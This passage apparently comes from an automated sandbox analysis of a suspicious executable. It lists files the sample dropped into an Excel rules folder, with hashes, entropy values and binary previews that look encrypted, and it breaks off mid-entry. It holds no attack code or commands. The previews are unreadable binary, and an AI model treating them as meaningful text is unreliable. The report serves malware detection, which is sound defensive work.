                                                                                                                                                  Preview:<?xml..n....z..S........K.K.....|.....k...,....:..9m....D...(..|..).........z>C....#*..?.H.b..S4...-..t.V....q.!.o.v..4......w.1..F5.Iz.....h?8....sJ...|.=.....w...`s....8G.g...!..K1xN......h.6.DKR..U_...s.Fh.....3.@.....CD.8..?..~...-7.+.M'..........79....o)vN.Q.1..b...N$..+........M....P=....h.....k......c/sH.,j..y2.Z@6....ou..;D.#e.b..JGO..+..W.k}...IS.I>...... ..O...A....c....j]...9.i....[..wq...^.......e......U.3$.."I......5.....X..D.r8...".g.0.l.<..E.!*...>mp....m39..s. Tv=..T3...X..v.W.c;.....U.../....Y.=.0.....<.....'n.W-..'...>8.0S[|.i..p).._.Df.f.9 I=.5...S..l..R....3.....=.....E..E.2~..g....pl...a[`..lps..9I)>.E#m....0....S..9&............mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700350v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1693
                                                                                                                                                  Entropy (8bit):7.892679949358428
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:4CmzmpsDZ5p7ZcrJnkFMzAolBr8BT5u+otgk55rMqCc5kned1Cf7+Q6m0YAZlsg/:WzmWDtdmkFuFWT5u0kQ6IeLub0YUKED
                                                                                                                                                  MD5:36C65F4777D1C2A05C0C0E0361A0AD66
                                                                                                                                                  SHA1:367B01C44169D96B2FCE362B220637EC5A356FBD
                                                                                                                                                  SHA-256:535FC1742E24EA7FC91919B541E9A4BCCA1C3537BEE8CE5D8D00C93EB694AB51
                                                                                                                                                  SHA-512:2756727E220F508FA95DA5387B52FEC948E0EB7383E6DBE124E09CAD86A5EE341D3F0AD5C3F78CA9E21FDB986C66DB8353644E9A9B44F5242268224EA1E431E9
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml..2.../4...Ar.<..B..y....QY.....>.._L..y.d......(s51..QR...Uc.@..#d..j.../.k.$g.t.4`.1'......#.=.X....{.L.Oy.E~..J....j.}h.27..rH.].@]....Q..`..-..Nm.*..I....r....ET.....0N{1..5J..Z....4,mz.'....$5...Q.J;.............n.RrHP.....~........}...?..*........0...P.{.MhG.T.'...;.B...D.-...{..,...........nX.`.)@<.q.. ,..........4.Q...z50..xhq..G.,x.R.U.B.'D.Q.r.>....%c.-p./.4f....'[.....X&.....d..b-..KF.={..j...3.{w.....G..i..W....../.l.v...Z}%.........@).sN.......2...I..z.ga.k<c.d....Y'lQ..4/.g......&.5.."......i#.$.t.s...;..>/7...Al.Hh..q..q........u'.._J&.5......J;....W..A.../.u...2.ASj.<...A.q! ..4..w...sG1..Mxi}.:.eD.z....Td..@.;.Zd....n.......P/.G.Jt^.~t.....=M.D.;!W.....w.O...m.E...I..H........a.n........We... ..,....a......C.^\c.d0..\..[......c.7..5.$.$.y.(>.......*.@ni.........U...).m...@...F.D4.../.w.fj...g...O.e.h..zS..F..{5.... ..X#.......{..]......0....L:...>8..d#.sJ_'B...'H..|?.....pF.=....QeG;.t..$....Pi.U...`...a.....P

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700351v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1730
                                                                                                                                                  Entropy (8bit):7.892989898794602
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:gXI2//XEM1KJquWDcqPAVsfpBWfBL9X+jzBG6oyQ3IiFEgBfbllIAIkI3E3UBW2X:X2//XP1vuW4psf+2i6gBkAIHD
                                                                                                                                                  MD5:0F46351C772AABF6DF3855379E027DAE
                                                                                                                                                  SHA1:57E05CEC2D88694080D96258830369CD8E7EF15F
                                                                                                                                                  SHA-256:48B94FFF3C2B830DE418C85E1DF9E3D091DB1DF176132DB7A381DF03722CA7E4
                                                                                                                                                  SHA-512:77D3744C4773E34B12CCAE6677FC799EDC44FFE29D400BCE903233C40770A0C6302184311F1025BD9BAEBD833FB43DE237D74D0748BDA9F61CE2966EE8DEBA0E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.......U.v...wV.Yf.....zU..T.....V.U.....G+|.S....y..C.{..1g4...e.&.1KDv......'6...V..uJ.2.V.87.#.E..I!...d....]s(]xn..!......35W.......y.h=.k..r..3.@.M.y8n.`..t.......1...G.Y..G...`J.....I..@d.=+......5F...e..^..HR...3.+!T...)[......y..eY.b..'...1....A:.M9GsR"....q.^[...T..e..|]....B.yh.......v9.........#./..F.;..9].'.)..(y..=d.hCG.....n.!Ce..T...r.G....`w....4..p.sr..{...9...s....<.2..?.Vy.....l.V(<...~...|.Qs........G...`..1OF.....2..'.:.D...,...).m.o.u..v.....8..'.*.*.L.Z......A......WC.x..&....C.9R.....m.2w.y.............6...u.>....a}6....;...G......n../.......-.]{'G.....-..+..~....S......b.e.O.....f...k.V...x`...q..F.`Q.....&"....~..f....<.1.FD4..peK..zR..t...8..Y.|'X..=liO..%..0.b........r[...NA.n.....c|..O.W..$..8n...2C.f,~.L...q...s....."..<..*......*..ao.!....L..,.?...Ef...W..>B..'..F4..ayV.Y]..mV~.A.2....j.{.....G...oR.L.7f4y....m."....i..g...+8..c|bZ....y....[#.c...E..f........*....yx4.#........-.Bh.V6.>..6=.....\\.z.>ZJ..$Xz..

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule70036v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):753
                                                                                                                                                  Entropy (8bit):7.713352808942205
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:kiTkY+hssQOrAY7FRrDqPtOcVRO2x5w+rpFvsvmRnXfLjHcyCHbtT+9R1L5qyjCb:jd+hsTPY7rDqP5RO2fldFvs+RP8Idp+b
                                                                                                                                                  MD5:6CC412576E5EB4AEA9DFA933766CDC6C
                                                                                                                                                  SHA1:CF4FC31882AA5A1E6B3DB53B244505A560BF483E
                                                                                                                                                  SHA-256:A66C6532003E3EEF5BFBDC5798CD58BC8208061C5656205991D51AC5B21E105A
                                                                                                                                                  SHA-512:40AFAAEB9BA684DAA910F1724D15936BADD99A143C5FE6D8C36E16A275935C5B4C248C6353CB972650BF5C3B8FC8EF3668A97199C6000D568E0A765196A7A833
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.."*}..9..nL.......6.Q........u......[|]X.....X.....8.O.4..!k..n.W..G.{.....dhv...%...kbn....../....,..L.I....S.R..6Oe?......Pi).6s.j..n.8.mL..p,.......9.Bz....:....f..G.......\.W..N.*..6..+g..$.B.b..&-...O..jA.0......]YxH....Pk.GU.!.~....OJ..%..6.!Y.j.....v.0+.Xx!P!...r.."..B..:..3..D...Y.z.+"........9..-...{/.... `D....mu.D.U.. ..PL.KAn....8.GT_......n.P....EI-u.6..{.a.....^..K.E.D......\...I...lu4......D.........c.........r..N7.^K....z...^".t.2.....I...W...0..;....q..,.0.U...|..%...q]hd[i....g.^*....s..eJ...K.[.$.F..P..;~.a.n#7..{.R.e... ./.......x6....i{1...z.e..AT.....e...p.. .p~$. ?....EfB..v..y...-<...o^..c.CGPz..mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule70037v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):773
                                                                                                                                                  Entropy (8bit):7.724460944146829
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:8Yy3/L5pH6ol+q+wUkOtX2tu/ZSbvC8HB+yBOxDdYv8p9zIRVUfJXViZihSUdNcq:8Yy3j5mmUkyGY+3hoxDdxp9kumIE2bD
                                                                                                                                                  MD5:3179C871E2E02B0D947ECBC029F99DF9
                                                                                                                                                  SHA1:5E246318066956D9F8938FF8843B55F86BA9A5FC
                                                                                                                                                  SHA-256:1B3E85E9DB8F830644006A5742090E7989ED6BE9EE46AB4B409A35F90129255E
                                                                                                                                                  SHA-512:2F16633F8E95652BCCF6575A70ABC101B8F6911052AAE669A49BDF6CC8F028E7629B76C93177108C546B3DDE4B25B3882A60985189D162833EBEAC2F799F5985
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.....`.1.w.D..N.[/.>...d.h...95........W...Pj........*\.L.}.i...../.O~b.H.c....._...;..........=[o..B.Q...v.....o..k.D...4.&..|I.S.R..U....s....e<<.!..Ag!.R"5.{:...u....nE...=..l...ru...",?...uT,..Ql......f./.)....<.).@.....75.A........3..@.M../.. ..6>Z..&E.X..7..s..(..Zk..n.../....PV.F"z.Jb|.Q....h...IC..DM.Sb.....,.L.B.5..]...*.2..A..i.m@@6.x....1.`...8#.!..(;...wk.k.#.......v......F<..V&R.]........F...{gn....b..K......~.P..z..}..oj.p.).j=...../....AU#...._=,-.R.J!.i R...FS....5k....=....dV.....6.^..f.Q..#.T-<..-pRc.g..Im.E..D@R..2.. ...Y.>h...g@g$_.....A....N..q4...eV.&d./E....R..\..R!.\..N.r./=..A.Z._../......./W...`.......o.......A..WB:A.(R.<.f...mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700400v2.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1699
                                                                                                                                                  Entropy (8bit):7.88647183488498
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:IM+DRry//P/EeiKtHQ0CT1z/ieLjFRnuqDD:IMkRrWnbntHQXLikbP
                                                                                                                                                  MD5:A469D7FAD31D57E861DE771F669EDA9F
                                                                                                                                                  SHA1:6C2D4CFFE5BDF34682AECC6B2F8ABD0F78744925
                                                                                                                                                  SHA-256:2CC0FEFF22EDAC30CF162E14BCF47F36E837EE7F919845185E2FB493875CE93D
                                                                                                                                                  SHA-512:8578FDB9F17EA1D721FC0D6C92605E2ECCF1E02640A77C1BBB0820E7F94D80C786CA5D917D0FABF08717BBCBCB972245A3CC8FCDD2ECACDDBE342927449F7864
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml..[.m...K..8-...=H.......Ehf.!.}.......JWN e..v=.O..#O.>.3}.).|.......2.... ....{V...I...:=.~..%.~4........`-.$^,.~..F..Q..-|...u4.oEX....'.3...._.=.a.....++...>J,.H..I.t....93.u....L.].*:...._I97...X..!....a.....r.......3...'....~L.4..%....D.w.'Z.R#..R.......u..aE+.Zt|%e...B...Tl.h......F.N...~..&.F.X.....a...CV........X^wL....#.3.......j...0.........p.{W..z/..HW.).....!Z=..?'t0F..9.L3F.Q.. #.0[a...._.:St\8...\6.<..E.k._.;.K.'.H.H......#.x...k[.1..0V..B..h*r.w.V.....R....X.....m.u$qYf.$.Z@L......}..m.F..'.G.k..E. ..".A.\....C}(.<.}o_hP..[^....Xt.e...4...p..B}.5K{..3.]....}.BNa0..P.h.+.I.6.B.2IB..g"..'f.H#......-Ng....". {......|!.2........5T.5..4.../.v...."B.mN...Z.zb...XKX.._t=;.S...\^hD..%...P.k..Mw0.(..$.......S..."o.....wX.....n..p.C.....u8@.cM.jVI.X...T..<.`R....K...].9X.n. H.9...X.$.TkWa..].D\S/Ah..+.rYj..-PH'.....)W..w.<...g.ec4,...I..S..o.....w...9Q..x.....'.<&.Ei.V.......5..g`.......5.q..e...L.g.D...n........@,....Z....D.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700401v2.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1736
                                                                                                                                                  Entropy (8bit):7.887594006604329
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:/Ch7j77WWCCsYWWJ4Ltv4+1EIY6ARMXca36fz/4sI8fm/D:/4n77KCwtv4+1PY16n6UJzr
                                                                                                                                                  MD5:7848A7A958F2C3A803B061CF54F4183A
                                                                                                                                                  SHA1:9FD13B99BA62D402ECB761D1316F16E443707940
                                                                                                                                                  SHA-256:CB4033280B92122498DD118640C3C8383D85666016E8AD77F2820688201F4B6E
                                                                                                                                                  SHA-512:03CDEC4E1C1FBCAFF454CDDFA57D847B55D6A2155326B7E3EE24CAF0231B7ED9B0ED62C044668B37D05BBD2E1646854DFD08EEEFC67B25449069BC204B66EC87
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml...T.q.N...H7.....Ze..]S2.EI...!1.Z.....;.p.+.1.P..g......ah..a.F6..........+0:...,....S..fO....?....m.7..z.?..4".k...FM..%r..(kY.)..:.ug#..J...,...N..E.3........".....;.$.d .j&;.k..h.j......F........uc..6gn.r....h9.n...B ...fqQ.-{..;.U...!..%.p.?..; x|+./.).....I...B..b0|...?k%.fg...n....fYV..3..7...l'.`.&?.$..|.Z.y....+.8..d}$.,....}^.`..;..B....h"..k........]..Y...P...bD.V....../..V....}.8.C2zoKa..o...[.7N.W.....7Z..a@<$l... u..B....d..A(...7.,...6e.d..c...tY[.6.t..iU7..ar..n...+..I"..v......|....I%..z.^....3.k..'..#.T..6N.......JW.... .......8>........$/.kp...._h...7.....EA.8..`...I..!..G....G.>?....?.y....kY.w..zd%VO....RK>/.....o1.c.X._n...Q..k..^..h6Sb.-......r.^.......Um.......|;.\H.g...\[...p.. ...5...A..t.(.5.C...R3.~|N..*.5.2..9...b. .m.~.....\AN%....}m.tm...m.T.|..`...L(..t...Z#....>..v..mR..n'....u1...BHN).]..Cd.ex.Y...Hq......\J!\[E......%..+TR*s..u.6^#.X.$%Z.J.?x.......1..U.x.)?Z.q~.r(.........u..d..i{|n..O.PI..

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700450v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1689
                                                                                                                                                  Entropy (8bit):7.888798302824001
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:r/eSATFWTBMvaoTphCs35WbuYILLju5xBPD:7eSATYLyXcbEIj
                                                                                                                                                  MD5:D0506913BCEDC9919EAED1CBAC97A445
                                                                                                                                                  SHA1:D94836C99F514B3FE628ECD66B90EDED29CD9839
                                                                                                                                                  SHA-256:E8F9C10224A983F0906C2F86DC233FC0E39ABA1E81DC1E602FFA85068A01F663
                                                                                                                                                  SHA-512:DE92333AE96B3137CCEA46A3A8AE3FDBA4613706658DFE4C2CA8DDF066E50480A96F71698CE0F93FA454713B197AB85500922832EB26E0DD726E3378B680E77B
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml@.i..R.3;;KS...A..h...~...u.Z...l^.(........^.MO|.i3...k](....8Xh"..K.....B..S...yP>M..'..1..=PNZ...7...m...T'w.>.IUg...-.b..N:...."YK.%...,V=gp)..|.Q.b.y...G=.B.......x.~.......a....N...C8K.Q.....W4.X.m..vw...R.l...u.i.zV.Bn.WI..^!..4.....j.....d'..,#..R.........D.i.t.).&../.m9o..#rwQ...C._..%V2.....Q.J.{O.2.b...=[^[.5.&.4...b.]j..S.E.O.iu..H....AN.m..G@.j"x...agzU6%lO.j......5..A..ixr..I}J....C...MM.Qkn..y_..P......y^.Ub...8R...0..S.*....X..1..q!a{....`a..~.R.#. V.sv..X.Ldy.R.'...0..B...?(.....Y...]..&J...<. I.NJ...).)....a?.U..-........MOm...L.....3.wof..".2.......>....t.G..Uc.............;.....=c...).Z....t...9f...[^.fHi..c.K3 \..b..jzH..I../4}.j.....b...i...R-.'^.[.C.,[.2uC.Z..Y.."..W..+vxa.8...M.....).)]Ka..9Q......5.D.H..M?"^z...1... ..0.:.V....L....,.....W....M...&.-.9.\1..../.:.I.^F@O......:.R#...Xj...U...H#.m.$..`?../...<...uJK\..DT.7q..|m.u....f..0.{..`...C..W.j.O..e.Yf.h#1....*..L:..7..;..8.]B?...Sx.r.*...U..\O.q ..B.U...{.!...

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700451v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1726
                                                                                                                                                  Entropy (8bit):7.870562445403246
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:xNfFxEbrtjgRdBJIBEKQNPKEXJe7yy3x+9b1VD:LdxArEPJIC/PXxyc9b1t
                                                                                                                                                  MD5:9AB0BE5907B8EB8ABBFB2CC8D03F3354
                                                                                                                                                  SHA1:08EBD86EB7AC3BACFA59FEE61DB31EA6F0747880
                                                                                                                                                  SHA-256:C85269DF29360FCFEC9957A0AB3679FEDE8CDAC7D536BACB69718BE6FB2594FD
                                                                                                                                                  SHA-512:A3411AA862A2179FF7D38F731A3F51AFDCF647E812B40EC58A769EF80881E80805F9C89D4D726C58883D673116BFD9AA8C1DC1C9FEBD97BF46E9AC95A13017CC
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlSe .o|.....b.k......+Iyd.e`f..m...).!/E.`+.>...t..g..O.q.:....c.R-.........L.~..&.o....(....D(.1..\..r.M>.....u.{=....R2../..*.a.B..:....V..7......TW.#7.2..U]R.(...wNb....9..&DXbq....D....:..i}....uP..:Fm^.....PN&...L..t......J..6ya].G.7.l..t(.)......;..m....]..c.U.'.m*./... N.KX...w..K..tV...}..5..-.$R.R...l.pX.pz*...F.@../m}....J.zc.Y.4L"!..q.3.H.[@....Y < ..-.1.E0.....J.........KB......*.....O....cWyj.ck.......s.I...-...yH5.b....LW.D._.NV....rZy.;5..p.54...4...+4.........3Q..f.s3.g..m..\q.p.....5.*..4..........q2X.....(/.w.7.@*...@c*..u.4..s.>Z./.[.o....\.\.Cr%...)..,..(..V8.J;:.@..l{<.k.Z....$p....7qBb....L.....*l...(.Lb....x....aG..;...R_...1.m..=k..R}.J@.d..,j....7>fw...9x...p5.j......kW....!..m.....$.X...YS....W...i......... 4.$....u...q.*.B.s.''$j..~. .zt..4..[W.....k:7:..@moT..n./-Q.{.`....S.FD.Im.L..f.hL)Q..pUP..\^;........G......4n!.....0E...F./N.HJ.Z.a.C@Ngq..t.y..az7..n....L..A.0a..*.r.rt...O;z[a....$...l..0.Q\E..R.....G.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700500v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1701
                                                                                                                                                  Entropy (8bit):7.883494607217315
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:/XrI9H9ja5M6mOMzFYDNvwb92THxBcbX6Z4VRAD:PKdjR6AzWZvw52THAbb7c
                                                                                                                                                  MD5:5EA3A59671487A0C1322500DC6992AD2
                                                                                                                                                  SHA1:B0F6D4B7608E4A8C596EFF03BBF14171079DB8D0
                                                                                                                                                  SHA-256:4F98B2F8F28007C6EA7A7D13D0C58D85763051E24685E16DFA7233AFF5A17112
                                                                                                                                                  SHA-512:3BD1DA44EBE30E01814962BC9D7B2B6DD6C38F322ECC4CD415D5E6CAC1A83FB93DC336B4B8F0DA1AE84C2205656BA09B1BC6108DD25B0AD5A94B6548093F15ED
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlx4...~.......JS...8_.......}.I".F.,.D.=_S6...G........}./k=N..r.=..F.. ../ A...U6K.....!]*..b.S.#.'.Cv..(....mu+......5N\'.!.w...g.>.m%|.o.....24/.._.N....e.9(t...g...$,.a.3..^...f;..E.okd{j....t....+m.Ys.Q..*#=.CL..4.d.._.w.h)@..E.R_....1=....G<./]...~.}}*]rH..|.m\.t......Hm....-...o..J.....g..Zk^...t.h&.\;...)'$I2.&9.!>...J.[4.A..gojK...5...^2..=u.W:..B."..M2.+...a65.........0.E Kq.P...y..'36x.Z6h.?yyX".....i......0.Y....J4..4..0P......k ..,.!i.9-..&.9.k....l{u............A#L.m...?..l.......mL...z..qK..mC..-.:.V6..Ps......y.#\......SS.y..a..C....g.(3..y.BX.70.....?DGD.b6."....zm.K.~.*.......Ml~..a.+^/G..y.|.I.......E.Om...~.9..=C..g..~....}.t+m.E.X].r..2...........DV......X..X.W..........jmf.,..;......ev...Y.KWp..-.....{Zg...D.j.z.P..A...c.2.=...E..+'..,;X,..|...&...g.Z...3........8....&.........p~.......fS.8w.4..W..<....$......#B..+`t.z....367k....u.j.2..c>.d.........@)[G.h.8c..g.<.F..Je.nl..lA8.d...u..U.{5.......5...n.G!b..#.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700501v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1738
                                                                                                                                                  Entropy (8bit):7.895111540012936
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:wRl+GbFjyYQ5JVcbZZDbKdq/RV7CwsbxLD:wn+GbFdQ5/cbZZDgqXmwst
                                                                                                                                                  MD5:B33912C4833D2DD9B00E7D4D034595CD
                                                                                                                                                  SHA1:8A85AC4343CFDA2CEA8CAD3F217EE5F03A1F217E
                                                                                                                                                  SHA-256:3A8475EA6AC5EEBDF1006CEA91A78280DF1D26ABC5265F5C2AF0A382F03104EC
                                                                                                                                                  SHA-512:C511FE82B3BB050DAF79991169B3ECE65CEFCAE78BBA9BE885708AC49865E6FC2A268C202FAE07700FB83CBFEAEA1C897DC86AB45E6D0B622987E9BF401DBE58
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.!r.,..v..%.o.0..(_IN.....K^.L2..|.}...U]~f.....b.....;.y..;....)I...vj+%4..H?]...L...s....[U...|....gM..c.74..E..y.e...0..P..dgf.pp..Pb.......z5.Z.....l<H.Z..O...3.A.#`....iXS....n.2.....)...A..|.0'... .e.bj...=Y...m,.*.............S...sR.p#j..l....A.(..../ofiT....b.z^.....$...&#.x..?.j&`.l.e....!V..N.K}.........V...1.~........]uV.]9....p......~..6?^.5..&..y..GmGqR.A...y.w.80......@.Kn..H..;+.B.DG4.%..g..a*..eC...f...`D.-...z;...kg6.OY..&.rt.MO.Q^.}.......{.$....J...;.k/v.. ..+5.....zN4....CN<....-.%...?I.4".....Ar.P.r....b.S5x.9.$].Z....9p..".M...r.&..........w....9..4..Z.u..f.A....y...B..z.......P.$.HU.Y.?.o.B........7..(TD9...._...3....C.!..0.%..D..&.~..D.....i.K..o....e........8.t.>.7.....~.....1_..i_....I...~....0.[.D.%.....`.:.>.&.@...ae..P'.|.0.q.\mo=rW...H.....+f,K-.[$29.7.qB.B..1....%z..w.Mf..uSU.,..o...X.\"...<..{....p._'...`7K.0...F....&.z.m:]....F.y.vO.`..R..k.=Q./...zYW...7=\...(..Hv.P.`....aR.....w..|.&.Mj...Zi

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700550v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1689
                                                                                                                                                  Entropy (8bit):7.905132976495835
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:SQRO2TZcLuIBC7AzozJO5JzKePIkS0AFsPuD:SEOAZcjgA4SNPgvsPW
                                                                                                                                                  MD5:D70367D82E398677BD01A2AC23994DBA
                                                                                                                                                  SHA1:B262834A7219775BC33EDFD63FDED49323E5884B
                                                                                                                                                  SHA-256:5974078184E878CC4C24D2C4E040822077E0C5C41747DD2BF92736C0EC3946AF
                                                                                                                                                  SHA-512:47181656B0E15CBF83994BC2866E7D6621D220F348679F1383C074ED896B97B5664B402D04E685A8203D03071BA50F1B4610C37837E26728D9F8AF0F81D761AE
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.!..z......,.....t.+....'T.....+......e.nOp8...Z.Ix.Q@7.......}....M....)....l.(fd.........RW...vE...."..ko4..$..<...m.B..:..o....J......dV..x..J..]D.}@..[S..?.A./..Yo.E.....]wO`.GxEi.c..&D.9O..O.$.Yw..LPd..+:.B/.$4]......H5..nO=.d$...s...0ku"@;d.j[..8~.?=.r.{..yqu~....A.G....o..i..H>..........y..`..61....Q.'.Iz-U.X...k9.......a.+....&=.BB.4.5e ..$d...Q........b.o:..S/N..t...6..._..7.%.......\.....\..]..`...p.......P).2J..Q..G.gfdX..4....I..dD<QU.....^.=..-.....xo.l1?........<..`zi.j....v'>u.p.X'.......l...TQ..^.Dx}..&(.S{.....C...(.RIB.|.0e#;`....p...!..'.......*FA...M.cu.v3...y*.#6"3.<....!.d..7.W.nC.|^.v...$.*.....~.A.C..gr..@).\..[............86..wt....`m.2...#HH.......9.i....t....n..E..(.':$%../.......Q.6 .....&ZWc.o...*Ou.Z.DEa4].\1P~i.7........w.....1..X>.F.P.K.......Me..S.b..{TW8.....$..].1....1.v.f.4....h.Sk..j.....".J.z..DJN...q&..O....M(..L.\..s.?.2.)..O.=.4..$.W...,.x.V`..H./+.kR.=.. .*.k.....IK..W2.%N+.,f.J1.\Z...Sq

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700551v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1726
                                                                                                                                                  Entropy (8bit):7.879597403820817
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:ykd2sJdpKFgHBVd5UBlFZ3tpw+cd5Rq94NkdpXWU+jrjje3Pq2/Zsk2bD:DpJLKFgHnSlF++cd5RCVXWU+j3KC2y3D
                                                                                                                                                  MD5:6DBA1F1E5C4145ACED4FFA7A26889B2D
                                                                                                                                                  SHA1:061ECC68AE5712CAE5988D844E404764110D235D
                                                                                                                                                  SHA-256:EFB646E394E1F91F698C6D2FCD6279153E4685857E8ECEAB981F991401476A99
                                                                                                                                                  SHA-512:9A162714F6051E62B4E6107030C0C5A5433607ABBCEB27DA1A19344B7E5524B97457F3F7C59AF6CDBFFE1A97EE5D95B2D233394DB6B93BD243C3402FE57FAD6C
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.H!k..........5.+.B.V+.5S.7.R.A.b.V.M.u`D.....%;bEl.I..tY....S...Q.."b.p..>N...D.k.Q.^....G...I..zL....L.7.....p...W..z.f........6.-.V..W...j8<T.......K..j..8@o..<Q.27.cw..l~1.e2..j..8']...G4.3..0&.._.DN....6.}'.7...W.5X..u..gk...{....42..b..)..F....5Z.......s....A..g..Ng....`o.%*..A]#3u.Y....{P.<.d.@6.f...."=.F.&I8..gB<v...B........wU..Co...Y6..aP..M.m...[..J5oe..g(..X.:....d7...r1.S.k6U.G..H.5.V.*.C}H.........Fe... Z4*.].y.YQlSI..v.......58..%hK....BI...:.h..?.......C)d..`.......kL.m:^\..G|G...)s4...x-K......$.K..V..j....A....H...C?.v.{.Y....jL........._.j].#...m..-R;i.R..x..9.A..wk...}.(:...B`..C.85........p.............).R.i..l..f.K........h..&o.)S3.......y(o......Z!....r..Bs?0.u..a..D...z...]..{.f..&..:.g.qnf{.s6.B.s..A........5...W.(\.K.?..4..I....I.;.`YL...=m.*^*Y'!.2..*.f).ME.W....JU.3....x..w.!C..=..^.....x..]...n4x...?R.}x0.Bz...$...#..r..2_....xUq.fX.-C.`N...%..E ...d....L.....C.ENjW.......i.TRXr......3.q....A.....U.B.`.?`...t.'..

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700600v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1697
                                                                                                                                                  Entropy (8bit):7.88506428174391
                                                                                                                                                  Encrypted:false
